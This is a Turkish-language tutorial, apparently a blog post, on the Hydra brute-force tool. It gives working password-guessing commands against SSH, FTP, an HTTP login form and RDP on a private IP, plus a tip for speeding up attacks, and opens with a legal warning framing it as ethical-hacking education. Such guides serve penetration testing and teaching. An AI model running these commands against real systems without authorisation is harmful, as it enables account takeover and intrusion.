Hydra Kullanımı (Brute-Force Saldırı Aracı)

BurakAk

Hydra, çeşitli servisler için hızlı ve çoklu giriş denemeleri yaparak kaba kuvvet (brute-force) saldırıları gerçekleştiren bir araçtır.Kali Linux'ta varsayılan olarak yüklü gelir.

⚠ UYARI: Yetkisiz sistemlere saldırmak yasa dışıdır! Bu rehber yalnızca etik siber güvenlik ve eğitim amaçlıdır.

1️⃣ Hydra Kurulumu

Eğer Hydra yüklü değilse, şu komutla yükleyebilirsiniz:

sudo apt install hydra -y
Kurulumu doğrulamak için:

hydra -h

✅ Hydra başarıyla yüklendiyse yardım menüsünü gösterir.

2️⃣ Hydra Kullanımı

Hydra'nın temel sözdizimi şöyledir:

hydra -L kullanıcı_listesi.txt -P parola_listesi.txt hedef_ip hizmet

🔹 SSH Brute-Force (SSH Şifresi Kırma)

Hedef SSH servisine kaba kuvvet saldırısı yapmak için:

hydra -l root -P wordlist.txt ssh://192.168.1.10

📌 Açıklama:

-l root: Tek kullanıcı adı (root) denenir.

-P wordlist.txt: Parola listesi kullanılır.

ssh://192.168.1.10: Hedef IP adresi belirtilir.

✔ Başarılı olursa, Hydra doğru kullanıcı adı ve şifreyi ekrana yazacaktır.

🔹 FTP Brute-Force (FTP Şifresi Kırma)

FTP servisine saldırı yapmak için:

hydra -L users.txt -P passwords.txt ftp://192.168.1.10

📌 Farkı nedir?

-L users.txt: Birden fazla kullanıcı adı listesi kullanır.

ftp://192.168.1.10: FTP servisine saldırı yapar.

🔹 HTTP Login Formu Brute-Force

Bazı web siteleri HTTP üzerinden giriş formu kullanır. Hydra ile bu girişleri deneyebilirsiniz:

hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Hatalı giriş"
📌 Açıklama:

/login.php: Giriş sayfası

user=^USER&pass=^PASS: Kullanıcı ve şifre giriş alanları

Hatalı giriş: Başarısız giriş yanıtı

✔ Eğer doğru şifre bulunursa Hydra bunu ekrana yazacaktır.

🔹 RDP Brute-Force (Windows Uzak Masaüstü)

Windows'un RDP servisini test etmek için:

hydra -L users.txt -P passwords.txt rdp://192.168.1.10

✅ Eğer bir parola doğruysa Hydra bunu gösterecektir.

3️⃣ Hydra Performansını Artırma

Hydra'nın hızını artırmak için eşzamanlı bağlantıları artırabilirsiniz:

hydra -t 8 -L users.txt -P passwords.txt ssh://192.168.1.10

📌 -t 8: Aynı anda 8 bağlantı açarak deneme yapar (çok daha hızlı olur).